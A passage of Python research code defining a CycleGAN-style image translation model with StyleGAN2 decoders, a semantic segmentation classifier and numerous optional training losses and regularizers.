domain), B (target domain).\n Generators: G_A: A -> B; G_B: B -> A.\n Discriminators: D_A: G_A(A) vs. B; D_B: G_B(B) vs. A.\n Forward cycle loss: lambda_A * ||G_B(G_A(A)) - A|| (Eqn. (2) in the paper)\n Backward cycle loss: lambda_B * ||G_A(G_B(B)) - B|| (Eqn. (2) in the paper)\n Identity loss (optional): lambda_identity * (||G_A(B) - B|| * lambda_B + ||G_B(A) - A|| * lambda_A) (Sec 5.2 \"Photo generation from paintings\" in the paper)\n Dropout is not used in the original CycleGAN paper.\n \"\"\"\n parser.set_defaults(no_dropout=True) # default CycleGAN did not use dropout\n if is_train:\n parser.add_argument('--lambda_A', type=float, default=10.0, help='weight for cycle loss (A -> B -> A)')\n parser.add_argument('--lambda_B', type=float, default=10.0, help='weight for cycle loss (B -> A -> B)')\n parser.add_argument('--lambda_identity', type=float, default=0.5, help='use identity mapping. Setting lambda_identity other than 0 has an effect of scaling the weight of the identity mapping loss. For example, if the weight of the identity loss should be 10 times smaller than the weight of the reconstruction loss, please set lambda_identity = 0.1')\n parser.add_argument('--lambda_G', type=float, default=1.0, help='weight for generator loss')\n parser.add_argument('--out_mask', action='store_true', help='use loss out mask')\n parser.add_argument('--lambda_out_mask', type=float, default=10.0, help='weight for loss out mask')\n parser.add_argument('--loss_out_mask', type=str, default='L1', help='loss mask')\n parser.add_argument('--charbonnier_eps', type=float, default=1e-6, help='Charbonnier loss epsilon value')\n parser.add_argument('--train_f_s_B', action='store_true', help='if true f_s will be trained not only on domain A but also on domain B')\n parser.add_argument('--fs_light',action='store_true', help='whether to use a light (unet) network for f_s')\n parser.add_argument('--lr_f_s', type=float, default=0.0002, help='f_s learning rate')\n parser.add_argument('--D_noise', action='store_true', help='whether to add instance noise to discriminator inputs')\n parser.add_argument('--D_label_smooth', action='store_true', help='whether to use one-sided label smoothing with discriminator')\n parser.add_argument('--rec_noise', type=float, default=0.0, help='whether to add noise to reconstruction')\n parser.add_argument('--wplus', action='store_true', help='whether to work in W+ latent space')\n parser.add_argument('--wskip', action='store_true', help='whether to use skip connections to latent wplus heads')\n parser.add_argument('--truncation',type=float,default=1,help='whether to use truncation trick (< 1)')\n parser.add_argument('--decoder_size', type=int, default=512)\n parser.add_argument('--d_reg_every', type=int, default=16,help='regularize discriminator each x iterations, no reg if set to 0')\n parser.add_argument('--g_reg_every', type=int, default=4,help='regularize decider sty2 each x iterations, no reg if set to 0')\n parser.add_argument('--r1', type=float, default=10)\n parser.add_argument('--mixing', type=float, default=0.9)\n parser.add_argument('--path_batch_shrink', type=int, default=2)\n parser.add_argument('--path_regularize', type=float, default=2)\n parser.add_argument('--no_init_weight_D_sty2', action='store_true')\n parser.add_argument('--no_init_weight_dec_sty2', action='store_true')\n parser.add_argument('--no_init_weight_G', action='store_true')\n parser.add_argument('--load_weight_decoder', action='store_true')\n parser.add_argument('--percept_loss', action='store_true', help='whether to use perceptual loss for reconstruction and identity')\n parser.add_argument('--randomize_noise', action='store_true', help='whether to use random noise in sty2 decoder')\n parser.add_argument('--D_lightness', type=int, default=1, help='sty2 discriminator lightness, 1: normal, then 2, 4, 8 for less parameters')\n\n parser.add_argument('--w_loss', action='store_true')\n parser.add_argument('--lambda_w_loss', type=float, default=10.0)\n\n parser.add_argument('--n_loss', action='store_true')\n parser.add_argument('--lambda_n_loss', type=float, default=10.0)\n\n parser.add_argument('--cam_loss', action='store_true')\n parser.add_argument('--lambda_cam', type=float, default=10.0)\n parser.add_argument('--sty2_clamp', action='store_true')\n \n return parser\n \n def __init__(self, opt):\n BaseModel.__init__(self, opt)\n \n # specify the training losses you want to print out. The program will call base_model.get_current_losses\n losses = ['G_A','G_B']\n losses += ['D_A', 'D_B']\n losses=[]\n if opt.out_mask:\n losses += ['out_mask_AB','out_mask_BA']\n\n losses += ['cycle_A', 'idt_A', \n 'cycle_B', 'idt_B', \n 'sem_AB', 'sem_BA', 'f_s']\n\n losses += ['g_nonsaturating_A','g_nonsaturating_B']\n\n if self.opt.g_reg_every != 0:\n losses +=['weighted_path_A','weighted_path_B']\n\n losses+= ['d_dec_A','d_dec_B']\n\n if self.opt.d_reg_every != 0:\n losses += ['grad_pen_A','grad_pen_B']#,'d_dec_reg_A', 'd_dec_reg_B']\n\n if opt.w_loss:\n losses += ['w_A','w_B']\n\n if opt.n_loss:\n losses += ['n_A','n_B']\n\n if opt.cam_loss:\n losses += ['cam']\n\n self.loss_names = losses\n self.truncation = opt.truncation\n self.randomize_noise = opt.randomize_noise\n self.r1 = opt.r1\n self.percept_loss = opt.percept_loss\n \n # specify the images you want to save/display. The program will call base_model.get_current_visuals\n visual_names_A = ['real_A', 'fake_B', 'rec_A']\n\n visual_names_B = ['real_B', 'fake_A', 'rec_B']\n\n if self.isTrain and self.opt.lambda_identity > 0.0:\n visual_names_A.append('idt_B')\n visual_names_B.append('idt_A') # beniz: inverted for original\n\n visual_names_seg_A = ['input_A_label','gt_pred_A','pfB_max']\n\n \n visual_names_seg_B = ['input_B_label','gt_pred_B','pfA_max']\n \n visual_names_out_mask = ['real_A_out_mask','fake_B_out_mask','real_B_out_mask','fake_A_out_mask']\n\n visual_names_mask = ['fake_B_mask','fake_A_mask']\n\n visual_names_mask_in = ['real_B_mask','fake_B_mask','real_A_mask','fake_A_mask',\n 'real_B_mask_in','fake_B_mask_in','real_A_mask_in','fake_A_mask_in']\n \n self.visual_names = visual_names_A + visual_names_B + visual_names_seg_A + visual_names_seg_B \n\n if opt.out_mask :\n self.visual_names += visual_names_out_mask\n\n # specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks\n if self.isTrain:\n self.model_names = ['G_A', 'G_B', 'f_s']\n else: # during test time, only load Gs\n self.model_names = ['G_A', 'f_s']\n\n # load/define networks\n # The naming conversion is different from those used in the paper\n # Code (paper): G_A (G), G_B (F), D_A (D_Y), D_B (D_X)\n print('define gen')\n self.netG_A = networks.define_G(opt.input_nc, opt.output_nc,\n opt.ngf, opt.netG, opt.norm, \n not opt.no_dropout, opt.G_spectral, opt.init_type, opt.init_gain, self.gpu_ids, decoder=False, wplus=opt.wplus, wskip=opt.wskip,img_size=opt.crop_size,img_size_dec=opt.decoder_size)\n self.netG_B = networks.define_G(opt.output_nc, opt.input_nc,\n opt.ngf, opt.netG, opt.norm, \n not opt.no_dropout, opt.G_spectral, opt.init_type, opt.init_gain, self.gpu_ids, decoder=False, wplus=opt.wplus, wskip=opt.wskip,img_size=opt.crop_size,img_size_dec=opt.decoder_size)\n\n # Define stylegan2 decoder\n print('define decoder')\n self.netDecoderG_A = networks.define_decoder(init_type=opt.init_type, init_gain=opt.init_gain,gpu_ids=self.gpu_ids,size=self.opt.decoder_size,init_weight=not self.opt.no_init_weight_dec_sty2,clamp=self.opt.sty2_clamp)\n self.netDecoderG_B = networks.define_decoder(init_type=opt.init_type, init_gain=opt.init_gain,gpu_ids=self.gpu_ids,size=self.opt.decoder_size,init_weight=not self.opt.no_init_weight_dec_sty2,clamp=self.opt.sty2_clamp)\n \n # Load pretrained weights stylegan2 decoder\n \n nameDGA = 'DecoderG_A'\n nameDGB = 'DecoderG_B'\n if self.opt.load_weight_decoder:\n load_filename = 'network_A.pt'\n load_path = os.path.join(self.save_dir, load_filename)\n \n net = getattr(self, 'net' + nameDGA)\n if isinstance(net, torch.nn.DataParallel):\n net = net.module\n print('loading the model from %s' % load_path)\n \n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n net.load_state_dict(state_dict['g_ema'])\n self.set_requires_grad(net, True)\n \n load_filename = 'network_B.pt'\n load_path = os.path.join(self.save_dir, load_filename)\n \n net = getattr(self, 'net' + nameDGB)\n \n if isinstance(net, torch.nn.DataParallel):\n net = net.module\n print('loading the model from %s' % load_path)\n \n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n net.load_state_dict(state_dict['g_ema'])\n self.set_requires_grad(net, True)\n\n if self.opt.truncation < 1:\n self.mean_latent_A = self.netDecoderG_A.module.mean_latent(4096)\n self.mean_latent_B = self.netDecoderG_B.module.mean_latent(4096)\n else:\n self.mean_latent_A = None\n self.mean_latent_B = None\n \n \n \n self.model_names += [nameDGA,nameDGB]\n \n print('define dis dec')\n self.netDiscriminatorDecoderG_A = networks.define_discriminatorstylegan2(init_type=opt.init_type, init_gain=opt.init_gain,gpu_ids=self.gpu_ids,init_weight=not self.opt.no_init_weight_D_sty2,img_size=self.opt.crop_size,lightness=opt.D_lightness)\n self.model_names += ['DiscriminatorDecoderG_A']\n\n self.netDiscriminatorDecoderG_B = networks.define_discriminatorstylegan2(init_type=opt.init_type, init_gain=opt.init_gain,gpu_ids=self.gpu_ids,init_weight=not self.opt.no_init_weight_D_sty2,img_size=self.opt.crop_size,lightness=opt.D_lightness)\n self.model_names += ['DiscriminatorDecoderG_B']\n \n self.netf_s = networks.define_f(opt.input_nc, nclasses=opt.semantic_nclasses, \n init_type=opt.init_type, init_gain=opt.init_gain,\n gpu_ids=self.gpu_ids, fs_light=opt.fs_light)\n\n if self.opt.cam_loss:\n self.netCamClassifier_w_B = networks.define_classifier_w(init_type=opt.init_type, init_gain=opt.init_gain,gpu_ids=self.gpu_ids,init_weight=not self.opt.no_init_weight_D_sty2,img_size_dec=self.opt.decoder_size)\n self.model_names += ['CamClassifier_w_B']\n self.netCamClassifier_w_A = networks.define_classifier_w(init_type=opt.init_type, init_gain=opt.init_gain,gpu_ids=self.gpu_ids,init_weight=not self.opt.no_init_weight_D_sty2,img_size_dec=self.opt.decoder_size)\n self.model_names += ['CamClassifier_w_A']\n \n if self.isTrain:\n if opt.lambda_identity > 0.0: # only works when input and output images have the same number of channels\n assert(opt.input_nc == opt.output_nc)\n self.fake_A_pool = ImagePool(opt.pool_size) # create image buffer to store previously generated images\n self.fake_B_pool = ImagePool(opt.pool_size) # create image buffer to store previously generated images\n self.real_A_pool = ImagePool(opt.pool_size)\n self.real_B_pool = ImagePool(opt.pool_size)\n \n # define loss functions\n if opt.D_label_smooth:\n target_real_label = 0.9\n else:\n target_real_label = 1.0\n self.criterionGAN = loss.GANLoss(opt.gan_mode,target_real_label=target_real_label).to(self.device)\n if opt.percept_loss:\n self.criterionCycle = VGGPerceptualLoss().cuda()\n self.criterionCycle2 = torch.nn.MSELoss()\n self.criterionIdt = VGGPerceptualLoss().cuda()\n self.criterionIdt2 = torch.nn.MSELoss()\n else:\n self.criterionCycle = torch.nn.L1Loss()\n self.criterionIdt = torch.nn.L1Loss()\n \n self.criterionf_s = torch.nn.modules.CrossEntropyLoss()\n if opt.out_mask:\n if opt.loss_out_mask == 'L1':\n self.criterionMask = torch.nn.L1Loss()\n elif opt.loss_out_mask == 'MSE':\n self.criterionMask = torch.nn.MSELoss()\n elif opt.loss_out_mask == 'Charbonnier':\n self.criterionMask = L1_Charbonnier_loss(opt.charbonnier_eps)\n\n if opt.w_loss:\n self.criterion_w = torch.nn.MSELoss()\n\n if opt.n_loss:\n self.criterion_n = torch.nn.MSELoss()\n\n if opt.cam_loss:\n self.criterion_cam_w = torch.nn.BCEWithLogitsLoss()\n \n # initialize optimizers\n if opt.cam_loss:\n self.optimizer_G = torch.optim.Adam(itertools.chain(self.netG_A.parameters(), self.netG_B.parameters(),self.netDecoderG_A.parameters(), self.netDecoderG_B.parameters(),self.netCamClassifier_w_A.parameters(),self.netCamClassifier_w_B.parameters()),\n lr=opt.lr, betas=(opt.beta1, 0.999))\n else:\n self.optimizer_G = torch.optim.Adam(itertools.chain(self.netG_A.parameters(), self.netG_B.parameters(),self.netDecoderG_A.parameters(), self.netDecoderG_B.parameters()),\n lr=opt.lr, betas=(opt.beta1, 0.999))\n\n self.optimizer_f_s = torch.optim.Adam(self.netf_s.parameters(), lr=opt.lr_f_s, betas=(opt.beta1, 0.999))\n\n self.optimizer_D_Decoder = torch.optim.Adam(itertools.chain(self.netDiscriminatorDecoderG_A.parameters(),self.netDiscriminatorDecoderG_B.parameters()),\n lr=opt.D_lr, betas=(opt.beta1, 0.999))\n self.optimizers = []\n self.optimizers.append(self.optimizer_G)\n #self.optimizers.append(self.optimizer_D)\n #beniz: not adding optimizers f_s (?)\n\n self.rec_noise = opt.rec_noise\n self.stddev = 0.1\n self.D_noise = opt.D_noise\n\n self.niter=0\n self.mean_path_length_A = 0\n self.mean_path_length_B = 0\n \n \n def set_input(self, input):\n AtoB = self.opt.direction == 'AtoB'\n self.real_A = input['A' if AtoB else 'B'].to(self.device)\n self.real_B = input['B' if AtoB else 'A'].to(self.device)\n self.image_paths = input['A_paths' if AtoB else 'B_paths']\n\n if 'A_label' in input :\n #self.input_A_label = input['A_label' if AtoB else 'B_label'].to(self.device)\n self.input_A_label = input['A_label'].to(self.device).squeeze(1)\n #self.input_A_label_dis = display_mask(self.input_A_label) \n if 'B_label' in input:\n self.input_B_label = input['B_label'].to(self.device).squeeze(1) # beniz: unused\n #self.image_paths = input['B_paths'] # Hack!! forcing the labels to corresopnd to B domain\n\n\n def forward(self):\n self.z_fake_B, self.n_fake_B = self.netG_A(self.real_A)\n\n d = 1\n \n #self.netDecoderG_A.eval()\n self.fake_B,self.latent_fake_B = self.netDecoderG_A(self.z_fake_B,input_is_latent=True,truncation=self.truncation,truncation_latent=self.mean_latent_A,randomize_noise=self.randomize_noise,return_latents=True, noise=self.n_fake_B)\n if self.opt.decoder_size > self.opt.crop_size:\n self.fake_B = F.interpolate(self.fake_B,self.opt.crop_size)\n \n if self.isTrain:\n #self.netDecoderG_B.eval()\n if self.rec_noise > 0.0:\n self.fake_B_noisy1 = gaussian(self.fake_B, self.rec_noise)\n self.z_rec_A, self.n_rec_A = self.netG_B(self.fake_B_noisy1)\n else:\n self.z_rec_A, self.n_rec_A = self.netG_B(self.fake_B)\n self.rec_A = self.netDecoderG_B(self.z_rec_A,input_is_latent=True,truncation=self.truncation,truncation_latent=self.mean_latent_B, randomize_noise=self.randomize_noise, noise=self.n_rec_A)[0]\n if self.opt.decoder_size > self.opt.crop_size:\n self.rec_A = F.interpolate(self.rec_A,self.opt.crop_size)\n \n self.z_fake_A, self.n_fake_A = self.netG_B(self.real_B)\n self.fake_A,self.latent_fake_A = self.netDecoderG_B(self.z_fake_A,input_is_latent=True,truncation=self.truncation,truncation_latent=self.mean_latent_B,randomize_noise=self.randomize_noise,return_latents=True, noise=self.n_fake_A)\n if self.opt.decoder_size > self.opt.crop_size:\n self.fake_A = F.interpolate(self.fake_A,self.opt.crop_size)\n \n if self.rec_noise > 0.0:\n self.fake_A_noisy1 = gaussian(self.fake_A, self.rec_noise)\n self.z_rec_B, self.n_rec_B = self.netG_A(self.fake_A_noisy1)\n else:\n self.z_rec_B, self.n_rec_B = self.netG_A(self.fake_A)\n self.rec_B = self.netDecoderG_A(self.z_rec_B,input_is_latent=True,truncation=self.truncation,truncation_latent=self.mean_latent_A, randomize_noise=self.randomize_noise, noise=self.n_rec_B)[0]\n if self.opt.decoder_size > self.opt.crop_size:\n self.rec_B = F.interpolate(self.rec_B,self.opt.crop_size)\n \n self.pred_real_A = self.netf_s(self.real_A)\n \n \n self.gt_pred_A = F.log_softmax(self.pred_real_A,dim= d).argmax(dim=d)\n \n self.pred_real_B = self.netf_s(self.real_B)\n self.gt_pred_B = F.log_softmax(self.pred_real_B,dim=d).argmax(dim=d)\n \n self.pred_fake_A = self.netf_s(self.fake_A)\n \n self.pfA = F.log_softmax(self.pred_fake_A,dim=d)#.argmax(dim=d)\n self.pfA_max = self.pfA.argmax(dim=d)\n\n if hasattr(self,'criterionMask'):\n label_A = self.input_A_label\n label_A_in = label_A.unsqueeze(1)\n label_A_inv = torch.tensor(np.ones(label_A.size())).to(self.device) - label_A\n label_A_inv = label_A_inv.unsqueeze(1)\n #label_A_inv = torch.cat ([label_A_inv,label_A_inv,label_A_inv],1)\n \n self.real_A_out_mask = self.real_A *label_A_inv\n self.fake_B_out_mask = self.fake_B *label_A_inv\n \n if self.D_noise:\n self.fake_B_noisy = gaussian(self.fake_B)\n self.real_A_noisy = gaussian(self.real_A)\n #self.real_A_mask_in = self.aug_seq(self.real_A_mask_in)\n #self.fake_B_mask_in = self.aug_seq(self.fake_B_mask_in)\n #self.real_A_mask = self.aug_seq(self.real_A_mask)\n #self.fake_B_mask = self.aug_seq(self.fake_B_mask)\n \n if hasattr(self, 'input_B_label'):\n \n label_B = self.input_B_label\n label_B_in = label_B.unsqueeze(1)\n label_B_inv = torch.tensor(np.ones(label_B.size())).to(self.device) - label_B\n label_B_inv = label_B_inv.unsqueeze(1)\n #label_B_inv = torch.cat ([label_B_inv,label_B_inv,label_B_inv],1)\n \n self.real_B_out_mask = self.real_B *label_B_inv\n self.fake_A_out_mask = self.fake_A *label_B_inv\n\n if self.D_noise:\n self.fake_A_noisy = gaussian(self.fake_A)\n self.real_B_noisy = gaussian(self.real_B)\n #self.real_B_mask_in = self.aug_seq(self.real_B_mask_in)\n #self.fake_A_mask_in = self.aug_seq(self.fake_A_mask_in)\n #self.real_B_mask = self.aug_seq(self.real_B_mask)\n #self.fake_A_mask = self.aug_seq(self.fake_A_mask)\n \n self.pred_fake_B = self.netf_s(self.fake_B)\n self.pfB = F.log_softmax(self.pred_fake_B,dim=d)#.argmax(dim=d)\n self.pfB_max = self.pfB.argmax(dim=d)\n\n\n \n def backward_D_basic(self, netD, real, fake):\n # Real\n pred_real = netD(real)\n loss_D_real = self.criterionGAN(pred_real, True)\n # Fake\n pred_fake = netD(fake.detach())\n loss_D_fake = self.criterionGAN(pred_fake, False)\n # Combined loss\n loss_D = (loss_D_real + loss_D_fake) * 0.5\n # backward\n loss_D.backward()\n return loss_D\n \n def backward_f_s(self):\n #print('backward fs')\n label_A = self.input_A_label\n # forward only real source image through semantic classifier\n pred_A = self.netf_s(self.real_A) \n self.loss_f_s = self.criterionf_s(pred_A, label_A)#.squeeze(1))\n if self.opt.train_f_s_B:\n label_B = self.input_B_label\n pred_B = self.netf_s(self.real_B) \n self.loss_f_s += self.criterionf_s(pred_B, label_B)#.squeeze(1))\n self.loss_f_s.backward()\n\n def backward_D_A(self):\n if self.D_noise:\n fake_B = self.fake_B_pool.query(self.fake_B_noisy)\n self.loss_D_A = self.backward_D_basic(self.netD_A, self.real_B_noisy, fake_B)\n else:\n fake_B = self.fake_B_pool.query(self.fake_B)\n self.loss_D_A = self.backward_D_basic(self.netD_A, self.real_B, fake_B)\n\n def backward_D_B(self):\n if self.D_noise:\n fake_A = self.fake_A_pool.query(self.fake_A_noisy)\n self.loss_D_B = self.backward_D_basic(self.netD_B, self.real_A_noisy, fake_A)\n else:\n fake_A = self.fake_A_pool.query(self.fake_A)\n self.loss_D_B = self.backward_D_basic(self.netD_B, self.real_A, fake_A)\n\n def backward_D_A_mask(self):\n fake_B_mask = self.fake_B_pool_mask.query(self.fake_B_mask)\n self.loss_D_A_mask = self.backward_D_basic(self.netD_A_mask, self.real_B_mask, fake_B_mask)\n\n def backward_D_B_mask(self):\n fake_A_mask = self.fake_A_pool_mask.query(self.fake_A_mask)\n self.loss_D_B_mask = self.backward_D_basic(self.netD_B_mask, self.real_A_mask, fake_A_mask)\n\n def backward_D_A_mask_in(self):\n fake_B_mask_in = self.fake_B_pool.query(self.fake_B_mask_in)\n self.loss_D_A = self.backward_D_basic(self.netD_A, self.real_B_mask_in, fake_B_mask_in)\n\n def backward_D_B_mask_in(self):\n fake_A_mask_in = self.fake_A_pool.query(self.fake_A_mask)\n self.loss_D_B = self.backward_D_basic(self.netD_B, self.real_A_mask_in, fake_A_mask_in)\n\n def backward_G(self):\n #print('BACKWARD G')\n lambda_idt = self.opt.lambda_identity\n lambda_A = self.opt.lambda_A\n lambda_B = self.opt.lambda_B\n lambda_G = self.opt.lambda_G\n # Identity loss\n if lambda_idt > 0:\n # G_A should be identity if real_B is fed.\n self.z_idt_A, self.n_idt_A = self.netG_A(self.real_B)\n self.idt_A = self.netDecoderG_A(self.z_idt_A,input_is_latent=True,truncation=self.truncation,truncation_latent=self.mean_latent_A,randomize_noise=self.randomize_noise, noise=self.n_idt_A)[0]\n if self.opt.decoder_size > self.opt.crop_size:\n self.idt_A = F.interpolate(self.idt_A,self.opt.crop_size)\n \n self.loss_idt_A = self.criterionIdt(self.idt_A, self.real_B) * lambda_B * lambda_idt\n if self.percept_loss:\n self.loss_idt_A += self.criterionIdt2(self.idt_A, self.real_B) * lambda_B * lambda_idt\n # G_B should be identity if real_A is fed.\n self.z_idt_B, self.n_idt_B = self.netG_B(self.real_A)\n self.idt_B = self.netDecoderG_B(self.z_idt_B,input_is_latent=True,truncation=self.truncation,truncation_latent=self.mean_latent_B,randomize_noise=self.randomize_noise, noise=self.n_idt_B)[0]\n if self.opt.decoder_size > self.opt.crop_size:\n self.idt_B = F.interpolate(self.idt_B,self.opt.crop_size)\n \n self.loss_idt_B = self.criterionIdt(self.idt_B, self.real_A) * lambda_A * lambda_idt\n if self.percept_loss:\n self.loss_idt_B += self.criterionIdt2(self.idt_B, self.real_A) * lambda_A * lambda_idt\n else:\n self.loss_idt_A = 0\n self.loss_idt_B = 0\n\n # Forward cycle loss\n self.loss_cycle_A = self.criterionCycle(self.rec_A, self.real_A) * lambda_A\n if self.percept_loss:\n self.loss_cycle_A += self.criterionCycle2(self.rec_A, self.real_A) * lambda_A\n # Backward cycle loss\n self.loss_cycle_B = self.criterionCycle(self.rec_B, self.real_B) * lambda_B\n if self.percept_loss:\n self.loss_cycle_B += self.criterionCycle2(self.rec_B, self.real_B) * lambda_B\n # combined loss standard cyclegan\n self.loss_G = self.loss_cycle_A + self.loss_cycle_B + self.loss_idt_A + self.loss_idt_B #self.loss_G_A + self.loss_G_B + \n\n # semantic loss AB\n self.loss_sem_AB = self.criterionf_s(self.pfB, self.input_A_label)\n \n # semantic loss BA\n if hasattr(self, 'input_B_label'):\n self.loss_sem_BA = self.criterionf_s(self.pfA, self.input_B_label)#.squeeze(1))\n else:\n self.loss_sem_BA = self.criterionf_s(self.pfA, self.gt_pred_B)#.squeeze(1))\n \n # only use semantic loss when classifier has reasonably low loss\n if not hasattr(self, 'loss_f_s') or self.loss_f_s.detach().item() > 1.0:\n self.loss_sem_AB = 0 * self.loss_sem_AB \n self.loss_sem_BA = 0 * self.loss_sem_BA \n self.loss_G += self.loss_sem_BA + self.loss_sem_AB\n\n lambda_out_mask = self.opt.lambda_out_mask\n\n if hasattr(self,'criterionMask'):\n self.loss_out_mask_AB = self.criterionMask( self.real_A_out_mask, self.fake_B_out_mask) * lambda_out_mask\n self.loss_out_mask_BA = self.criterionMask( self.real_B_out_mask, self.fake_A_out_mask) * lambda_out_mask\n self.loss_G += self.loss_out_mask_AB + self.loss_out_mask_BA\n\n\n compute_g_regularize = True\n if self.opt.path_regularize == 0.0 or self.opt.g_reg_every == 0 or not self.niter % self.opt.g_reg_every == 0 :\n #self.loss_weighted_path_A = 0* self.loss_weighted_path_A\n #self.loss_weighted_path_B = 0* self.loss_weighted_path_B\n compute_g_regularize = False\n \n #A\n self.fake_pred_g_loss_A = self.netDiscriminatorDecoderG_A(self.fake_A)\n self.loss_g_nonsaturating_A = self.g_nonsaturating_loss(self.fake_pred_g_loss_A)\n \n if compute_g_regularize:\n self.path_loss_A, self.mean_path_length_A, self.path_lengths_A = self.g_path_regularize(\n self.fake_A, self.latent_fake_A, self.mean_path_length_A\n )\n\n self.loss_weighted_path_A = self.opt.path_regularize * self.opt.g_reg_every * self.path_loss_A\n \n if self.opt.path_batch_shrink:\n self.loss_weighted_path_A += 0 * self.fake_A[0, 0, 0, 0]\n\n self.mean_path_length_avg_A = (\n self.reduce_sum(self.mean_path_length_A).item() / self.get_world_size()\n )\n else:\n self.loss_weighted_path_A = 0#*self.loss_weighted_path_A\n\n #B\n self.fake_pred_g_loss_B = self.netDiscriminatorDecoderG_B(self.fake_B)\n self.loss_g_nonsaturating_B = self.g_nonsaturating_loss(self.fake_pred_g_loss_B)\n \n if compute_g_regularize:\n self.path_loss_B, self.mean_path_length_B, self.path_lengths_B = self.g_path_regularize(\n self.fake_B, self.latent_fake_B, self.mean_path_length_B\n )\n\n self.loss_weighted_path_B = self.opt.path_regularize * self.opt.g_reg_every * self.path_loss_B\n \n if self.opt.path_batch_shrink:\n #self.loss_weighted_path_B += 0 * self.fake_img_path_loss_B[0, 0, 0, 0]\n self.loss_weighted_path_B += 0 * self.fake_B[0, 0, 0, 0]\n\n self.mean_path_length_avg_B = (\n self.reduce_sum(self.mean_path_length_B).item() / self.get_world_size()\n )\n else:\n self.loss_weighted_path_B = 0#*self.loss_weighted_path_B\n\n self.loss_G += self.opt.lambda_G*(self.loss_g_nonsaturating_A + self.loss_g_nonsaturating_B)\n\n if not self.opt.path_regularize == 0.0 and not self.opt.g_reg_every == 0 and self.niter % self.opt.g_reg_every == 0 :\n self.loss_G += self.loss_weighted_path_A + self.loss_weighted_path_B\n\n if self.opt.w_loss:\n p = random.uniform(0, 1)\n if p<0.5:#idt as reference\n self.loss_w_A = self.criterion_w(self.z_idt_B.clone().detach(),self.z_rec_A) * self.opt.lambda_w_loss\n self.loss_w_B = self.criterion_w(self.z_idt_A.clone().detach(),self.z_rec_B) * self.opt.lambda_w_loss\n else:#rec as reference\n self.loss_w_A = self.criterion_w(self.z_idt_B,self.z_rec_A.clone().detach()) * self.opt.lambda_w_loss\n self.loss_w_B = self.criterion_w(self.z_idt_A,self.z_rec_B.clone().detach()) * self.opt.lambda_w_loss\n\n self.loss_G += self.loss_w_A + self.loss_w_B\n\n if self.opt.n_loss:\n p = random.uniform(0, 1)\n temp_n_idt_B = [temp.flatten()for temp in self.n_idt_B]\n temp_n_idt_A = [temp.flatten()for temp in self.n_idt_A]\n temp_n_rec_B = [temp.flatten()for temp in self.n_rec_B]\n temp_n_rec_A = [temp.flatten()for temp in self.n_rec_A]\n if p<0.5:#idt as reference\n self.loss_n_A = self.criterion_n(torch.cat(temp_n_idt_B).clone().detach(),torch.cat(temp_n_rec_A)) * self.opt.lambda_n_loss\n self.loss_n_B = self.criterion_n(torch.cat(temp_n_idt_A).clone().detach(),torch.cat(temp_n_rec_B)) * self.opt.lambda_n_loss\n else:#rec as reference\n self.loss_n_A = self.criterion_n(torch.cat(temp_n_idt_B),torch.cat(temp_n_rec_A).clone().detach()) * self.opt.lambda_n_loss\n self.loss_n_B = self.criterion_n(torch.cat(temp_n_idt_A),torch.cat(temp_n_rec_B).clone().detach()) * self.opt.lambda_n_loss\n\n self.loss_G += self.loss_n_A + self.loss_n_B\n\n if self.opt.cam_loss:\n self.pred_w_fake_A = self.netCamClassifier_w_A(torch.stack(self.z_fake_A))\n self.pred_w_rec_A = self.netCamClassifier_w_A(torch.stack(self.z_rec_A))\n self.pred_w_idt_A = self.netCamClassifier_w_A(torch.stack(self.z_idt_A))\n \n self.pred_w_fake_B = self.netCamClassifier_w_B(torch.stack(self.z_fake_B))\n self.pred_w_rec_B = self.netCamClassifier_w_A(torch.stack(self.z_rec_B))\n self.pred_w_idt_B = self.netCamClassifier_w_B(torch.stack(self.z_idt_B))\n \n self.loss_cam = self.criterion_cam_w(self.pred_w_fake_A,torch.ones_like(self.pred_w_fake_A).to(self.device)) * self.opt.lambda_cam\n self.loss_cam += self.criterion_cam_w(self.pred_w_fake_B,torch.ones_like(self.pred_w_fake_B).to(self.device))* self.opt.lambda_cam\n self.loss_cam += self.criterion_cam_w(self.pred_w_rec_B,torch.ones_like(self.pred_w_rec_B).to(self.device))* self.opt.lambda_cam\n self.loss_cam += self.criterion_cam_w(self.pred_w_rec_A,torch.ones_like(self.pred_w_rec_A).to(self.device))* self.opt.lambda_cam\n\n self.loss_cam += self.criterion_cam_w(self.pred_w_idt_A,torch.zeros_like(self.pred_w_idt_A).to(self.device)) * self.opt.lambda_cam\n self.loss_cam += self.criterion_cam_w(self.pred_w_idt_B,torch.zeros_like(self.pred_w_idt_B).to(self.device)) * self.opt.lambda_cam\n\n self.loss_G += self.loss_cam\n \n self.loss_G.backward()\n\n def backward_discriminator_decoder(self):\n real_pred_A = self.netDiscriminatorDecoderG_A(self.real_A)\n fake_pred_A = self.netDiscriminatorDecoderG_A(self.fake_A_pool.query(self.fake_A))\n\n self.loss_d_dec_A = self.d_logistic_loss(real_pred_A,fake_pred_A).unsqueeze(0)\n\n #print(self.loss_d_dec_A)\n \n\n \n real_pred_B = self.netDiscriminatorDecoderG_B(self.real_B)\n fake_pred_B = self.netDiscriminatorDecoderG_B(self.fake_B_pool.query(self.fake_B))\n self.loss_d_dec_B = self.d_logistic_loss(real_pred_B,fake_pred_B).unsqueeze(0)\n\n self.loss_d_dec = self.loss_d_dec_A + self.loss_d_dec_B\n #print(self.d_loss)\n #print(self.d_loss.shape)\n \n if self.opt.d_reg_every != 0:\n if self.niter %self.opt.d_reg_every == 0:\n temp = real_pred_A/real_pred_A.detach()\n \n #self.real_A.requires_grad = True\n #real_pred_A_2 = self.netDiscriminatorDecoderG_A(self.real_A)\n cur_real_A = self.real_A_pool.query(self.real_A)\n cur_real_A.requires_grad = True\n real_pred_A_2 = self.netDiscriminatorDecoderG_A(cur_real_A)\n #r1_loss_A = self.d_r1_loss(real_pred_A_2, cur_real_A)\n\n self.loss_grad_pen_A = self.gradient_penalty(cur_real_A,real_pred_A_2,self.r1)\n \n #self.loss_d_dec_reg_A=self.opt.r1 / 2 * r1_loss_A * self.opt.d_reg_every * temp\n \n #self.real_B.requires_grad = True\n #real_pred_B_2 = self.netDiscriminatorDecoderG_B(self.real_B)\n cur_real_B = self.real_B_pool.query(self.real_B)\n cur_real_B.requires_grad = True\n real_pred_B_2 = self.netDiscriminatorDecoderG_B(cur_real_B)\n #r1_loss_B = self.d_r1_loss(real_pred_B_2, cur_real_B)\n \n 